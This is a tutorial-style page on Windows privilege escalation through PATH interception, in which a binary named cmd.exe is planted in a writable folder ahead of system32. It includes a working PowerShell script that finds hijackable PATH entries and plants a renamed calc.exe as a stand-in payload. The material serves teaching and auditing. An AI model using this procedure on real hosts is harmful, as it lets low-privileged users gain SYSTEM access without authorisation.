Environment Variable $Path Interception

It's possible to abuse the $PATH environment variable to elevate privileges if the variable:

  • contains a folder that a low-privileged (malicious) user can write to, and

  • that folder precedes c:\windows\system32\ in the PATH order

A shell such as cmd.exe or PowerShell resolves a bare executable name by walking the PATH directories in order, so a same-named binary planted in the earlier folder is found before the real one in system32.

In this example, the system PATH lists c:\temp before c:\windows\system32.

Let's make sure c:\temp is (M)odifiable by low-privileged users (the M flag in icacls output is Modify, which includes creating, writing and deleting files).

Let's now drop our malicious file (a renamed copy of calc.exe in this case) into c:\temp and call it cmd.exe.

Now, the next time a high-privileged user or service invokes cmd.exe by bare name through a PATH lookup (for example from a batch script, another shell, or PowerShell), our malicious cmd.exe is started from c:\temp instead of the real one. One caveat: a direct CreateProcess call given only the file name checks the Windows system directory before the PATH directories, so whether the hijack fires depends on how the privileged caller resolves the name.

This is very easily abused in environments where software deployment packages call powershell, cmd, cscript and similar system binaries by bare name with NT AUTHORITY\SYSTEM privileges to carry out their tasks.
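The whole procedure above (checking the PATH order, verifying the folder is writable, planting the renamed calc.exe and confirming which cmd.exe resolves first), as an added PowerShell example that is not part of the original page. It goes slightly beyond the page in two ways: it reads the machine-scope PATH from the registry, because that is the PATH a SYSTEM service or deployment agent inherits (the attacker's own user PATH is irrelevant to other accounts), and it also flags PATH entries that do not exist yet but that the user could create. The function names Get-HijackablePathDirs and Invoke-PathHijackDemo are invented here; C:\temp, cmd.exe and calc.exe are the page's own example values.

```powershell
# Added example (not from the original page). Run as the low-privileged user on
# the target host. Assumptions: the machine PATH lives under the standard
# Session Manager\Environment key; C:\temp / cmd.exe / calc.exe are the page's
# example values; function names are hypothetical.

function Get-HijackablePathDirs {
    [CmdletBinding()]
    param(
        # Binaries a privileged deployment script is likely to call by bare name;
        # only used to report which planted file names would be picked up.
        [string[]]$TargetBinaries = @('cmd.exe', 'powershell.exe', 'cscript.exe')
    )

    # Read the *machine* PATH from the registry: that is what a SYSTEM service or
    # deployment agent inherits. Our own user PATH is irrelevant to other accounts.
    $regKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    $rawPath = (Get-ItemProperty -LiteralPath $regKey -Name Path).Path

    # Registry entries are stored unexpanded (e.g. %SystemRoot%\system32).
    $dirs = @($rawPath -split ';' | Where-Object { $_.Trim() } |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()).TrimEnd('\') })

    # Only directories listed *before* System32 can shadow its binaries.
    $system32 = Join-Path $env:SystemRoot 'System32'
    $sysIndex = $dirs.Count
    for ($j = 0; $j -lt $dirs.Count; $j++) {
        if ($dirs[$j] -eq $system32) { $sysIndex = $j; break }
    }

    for ($i = 0; $i -lt $sysIndex; $i++) {
        $dir    = $dirs[$i]
        $reason = $null

        if (Test-Path -LiteralPath $dir -PathType Container) {
            # ACL text like (M) can mislead (deny ACEs, ownership quirks), so prove
            # write access by creating and deleting a file. Any failure = not ours.
            $probe = Join-Path $dir ('probe_{0}.tmp' -f [Guid]::NewGuid())
            try {
                [IO.File]::WriteAllText($probe, '')
                $reason = 'existing directory is writable'
            } catch { continue }
            finally { Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue }
        } else {
            # A PATH entry that does not exist yet is searched as soon as it exists;
            # if we can create it, anything we put there is found first.
            $parent = Split-Path -Path $dir -Parent
            if (-not $parent -or -not (Test-Path -LiteralPath $parent -PathType Container)) { continue }
            try {
                New-Item -ItemType Directory -Path $dir -ErrorAction Stop | Out-Null
                Remove-Item -LiteralPath $dir -Force -ErrorAction SilentlyContinue
                $reason = 'missing directory, but we can create it'
            } catch { continue }
        }

        [PSCustomObject]@{
            Index      = $i
            Directory  = $dir
            Reason     = $reason
            WouldPlant = ($TargetBinaries | ForEach-Object { Join-Path $dir $_ }) -join ', '
        }
    }
}

function Invoke-PathHijackDemo {
    param(
        [string]$Directory = 'C:\temp',   # the page's writable, early PATH entry
        [string]$Name      = 'cmd.exe'    # the name a privileged caller will look up
    )
    # Harmless stand-in, exactly as on the page: calc.exe renamed to cmd.exe.
    $payload = Join-Path $env:SystemRoot 'System32\calc.exe'
    Copy-Item -LiteralPath $payload -Destination (Join-Path $Directory $Name) -Force

    # Both cmd.exe's lookup ("where") and PowerShell's command resolution walk PATH
    # in order, so the first result is the planted file, not the one in System32.
    # cmd.exe is launched by full path here so we do not run our own planted copy.
    & "$env:SystemRoot\System32\cmd.exe" /c "where $Name"
    (Get-Command -Name $Name -CommandType Application | Select-Object -First 1).Source
}

Get-HijackablePathDirs | Format-Table -AutoSize
# Invoke-PathHijackDemo   # uncomment to plant C:\temp\cmd.exe and show which copy resolves first
```

If the table comes back empty the host is not exposed to this particular trick even when some PATH folder is writable, because only entries ahead of System32 matter. Remember that the report covers shell-style lookups; a privileged caller that hands a bare name straight to CreateProcess consults the system directory before PATH and will not pick up the planted file.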
